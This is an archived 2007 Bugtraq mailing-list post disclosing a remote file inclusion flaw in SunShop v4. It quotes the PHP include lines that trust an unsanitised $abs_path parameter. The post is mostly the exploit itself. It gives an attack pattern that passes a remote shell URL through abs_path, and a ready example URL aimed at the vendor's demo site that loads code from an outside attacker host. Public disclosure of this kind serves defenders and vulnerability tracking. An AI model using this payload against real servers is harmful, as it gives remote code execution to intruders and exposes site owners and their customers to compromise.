lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070425153816.22259.qmail@securityfocus.com> Date: 25 Apr 2007 15:38:16 -0000 From: info@...kerz.ir To: bugtraq@...urityfocus.com Subject: sunshop v4 >> RFI vendor : turnkeywebtools.com by : s3rv3r_hack3r ( alijsb@...oo.com ) bugz: ++++++++++++++++++++ include/payment/payflow_pro.php > include $abs_path."/include/payment/payflow_pro/pfpro.class.php"; ++++++++++++++++++++ global.php require_once $abs_path."/libsecure.php"; ++++++++++++++++++++ libsecure.php include $abs_path . '/admin/config.php'; ++++++++++++++++++++ EXploit : file.php?abs_path=http://shell for example : http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?